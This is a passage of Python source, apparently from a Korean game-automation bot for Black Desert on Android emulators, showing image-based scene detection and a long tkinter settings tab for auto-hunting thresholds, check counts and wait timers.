(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[each_icon],
custom_threshold=0.8,
custom_flag=1,
custom_rect=(80, 110, 570, 300)
)
# print('[DEBUG] nox yh icon:', (loc_x, loc_y), match_rate)
if loc_x != -1:
break
elif self.player_type == 'momo':
for each_icon in LYBBlackDesert.momo_bd_icon_list:
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[each_icon],
custom_threshold=0.8,
custom_flag=1,
custom_rect=(30, 40, 610, 300)
)
# print('[DEBUG] momo yh icon:', (loc_x, loc_y), match_rate)
if loc_x != -1:
break
if loc_x == -1:
return ''
return 'init_screen_scene'
def scene_google_play_account_select(self, window_image):
loc_x_list = []
loc_y_list = []
pb_name = 'google_play_letter'
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[pb_name],
custom_flag=1,
custom_rect=(150, 50, 490, 270)
)
# self.logger.warn(str((loc_x, loc_y)) + ':' + str(match_rate))
# self.getImagePixelBox(pb_name).save(pb_name + '.png')
loc_x_list.append(loc_x)
loc_y_list.append(loc_y)
for i in range(6):
pb_name = 'google_play_letter_' + str(i)
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[pb_name],
custom_flag=1,
custom_rect=(150, 50, 490, 270)
)
# self.logger.warn(str((loc_x, loc_y)) + ':' + str(match_rate))
# self.getImagePixelBox(pb_name).save(pb_name + '.png')
loc_x_list.append(loc_x)
loc_y_list.append(loc_y)
for each_loc in loc_x_list:
if each_loc == -1:
return ''
else:
continue
return 'google_play_account_select_scene'
def clear_scene(self):
last_scene = self.scene_dic
self.scene_dic = {}
for scene_name, scene in last_scene.items():
if ( 'google_play_account_select_scene' in scene_name or
'logo_screen_scene' in scene_name or
'connect_account_scene' in scene_name
):
self.scene_dic[scene_name] = last_scene[scene_name]
def add_scene(self, scene_name):
self.scene_dic[scene_name] = lybscene.LYBBlackDesertScene(scene_name)
self.scene_dic[scene_name].setLoggingQueue(self.logging_queue)
self.scene_dic[scene_name].setGameObject(self)
class LYBBlackDesertTab(lybgame.LYBGameTab):
def __init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name=lybconstant.LYB_GAME_BLACKDESERT):
lybgame.LYBGameTab.__init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name)
def set_work_list(self):
lybgame.LYBGameTab.set_work_list(self)
for each_work in LYBBlackDesert.work_list:
self.option_dic['work_list_listbox'].insert('end', each_work)
self.configure.common_config[self.game_name]['work_list'].append(each_work)
def set_option(self):
###############################################
# 메인 퀘스트 진행 #
###############################################
frame = ttk.Frame(self.inner_frame_dic['frame_top'], relief=self.frame_relief)
frame.pack(anchor=tkinter.W)
# PADDING
frame = ttk.Frame(
master = self.master,
relief = self.frame_relief
)
frame.pack(pady=5)
self.inner_frame_dic['options'] = ttk.Frame(
master = self.master,
relief = self.frame_relief
)
self.option_dic['option_note'] = ttk.Notebook(
master = self.inner_frame_dic['options']
)
self.inner_frame_dic['common_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['hunt_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['hunt2_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['work_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['work2_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['tobeol_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['notify_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['common_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['common_tab_frame'], text='일반')
self.inner_frame_dic['hunt_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['hunt_tab_frame'], text='자동 사냥')
self.inner_frame_dic['hunt2_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['hunt2_tab_frame'], text='자동 사냥2')
self.inner_frame_dic['work_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['work_tab_frame'], text='작업별 설정')
self.inner_frame_dic['work2_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['work2_tab_frame'], text='작업별 설정2')
self.inner_frame_dic['tobeol_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['tobeol_tab_frame'], text='토벌 게시판')
self.inner_frame_dic['notify_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['notify_tab_frame'], text='알림')
frame_head = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_left = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_left, text='인식 허용률(%)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("메인퀘스트 관련 이미지")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'].trace(
'w', lambda *args: self.callback_threshold_mainquest_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'] = 70
combobox_list = []
for i in range(50, 91):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("대화 건너뛰기 이미지")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'].trace(
'w', lambda *args: self.callback_threshold_conversation_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'] = 85
combobox_list = []
for i in range(50, 91):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("전흔, 채광, 채집, 벌목 이미지")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'].trace(
'w', lambda *args: self.callback_threshold_combat_box_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'] = 70
combobox_list = []
for i in range(50, 91):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_left, text='상태 체크(회)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 태세 전 수동 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'].trace(
'w', lambda *args: self.callback_threshold_sudong_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'] = 3
combobox_list = []
for i in range(2, 100):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("미궁 감지 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'].trace(
'w', lambda *args: self.callback_threshold_migung_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'] = 10
combobox_list = []
for i in range(5, 31):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("이동 중 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'].trace(
'w', lambda *args: self.callback_threshold_moving_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'] = 200
combobox_list = []
for i in range(0, 1001, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("물약 없음 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'].trace(
'w', lambda *args: self.callback_threshold_potion_empty_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit')
)
if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'] = 30
combobox_list = []
for i in range(0, 1001, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_left.pack(side=tkinter.LEFT, anchor=tkinter.NW)
frame_label = ttk.LabelFrame(frame_head, text='반복 주기(초)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("무반응시 메인 퀘스트 클릭 주기")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'].trace(
'w', lambda *args: self.callback_period_mainquest_afk_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'] = 120
combobox_list = []
for i in range(5, 240, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 사냥 랙 방지 움직임 주기")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'].trace(
'w', lambda *args: self.callback_period_jadong_lag_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'] = 0
combobox_list = []
for i in range(0, 1201, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("토벌/미궁 랙 방지 움직임 주기")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'].trace(
'w', lambda *args: self.callback_period_migung_lag_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'] = 30
combobox_list = []
for i in range(0, 1201, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_head, text='대기 시간(초)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 클릭 후 다음 클릭까지")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'].trace(
'w', lambda *args: self.callback_period_mainquest_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'] = 120
combobox_list = []
for i in range(5, 30000, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 클릭 후 수동 스킬 사용")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_WAIT_ATTACK)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'].trace(
'w', lambda *args: self.callback_period_wait_attack_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'] = 30
combobox_list = []
for i in range(5, 240, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 클릭 후 자동 태세 전환")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'].trace(
'w', lambda *args: self.callback_period_wait_jadong_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'] = 10
combobox_list = []
for i in range(5, 300, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("가방 경고 인식 후 클릭 대기")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOLTIP_GABANG_FULL)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'].trace(
'w', lambda *args: self.callback_period_gabang_full_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'] = 30
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("절전 모드 경고 인식 후 대기")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOLTIP_GABANG_FULL)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'].trace(
'w', lambda *args: self.callback_period_jeoljeon_mode_warning_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'] = 1800
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("물약 상점 인식 지연 시간")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOTLIP_POTION_SHOP)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'].trace(
'w', lambda *args: self.callback_period_potion_shop_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'] = 300
combobox_list = []
for i in range(5, 600, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("월드 보스 이동 시간")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOTLIP_POTION_SHOP)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'].trace(
'w', lambda *args: self.callback_period_world_boss_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss')
)
if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'] = 90
combobox_list = []
for i in range(10, 301, 5):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
# frame = ttk.Frame(frame_label)
# label = ttk.Label(
# master = frame,
# text = self.get_option_text("반복 퀘스트 완료 대기(랜덤)")
# )
# label.pack(side=tkinter.LEFT)
# self.tooltip(label, lybconstant.LYB_TOOTLIP_POTION_SHOP)
# self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'] = tkinter.StringVar(frame)
# self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'].trace(
# 'w', lambda *args: self.callback_period_reqeat_quest_random_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random')
# )
# if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random' in self.configure.common_config[self.game_name]:
# self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'] = 10
# combobox_list = []
# for i in range(0, 1000):
# combobox_list.append(str(i))
# combobox = ttk.Combobox(
# master = frame,
# values = combobox_list,
# textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'],
# state = "readonly",
# height = 10,
# width = 5,
# font = lybconstant.LYB_FONT
# )
# combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'])
# combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
# frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_head.pack(anchor=tkinter.W)
frame_head = ttk.Frame(self.inner_frame_dic['hunt_tab_frame'])
frame_label = ttk.LabelFrame(frame_head, text='설정')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'].trace(
'w', lambda *args: self.callback_quest_repeat_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '반복 의뢰를 수락합니다',
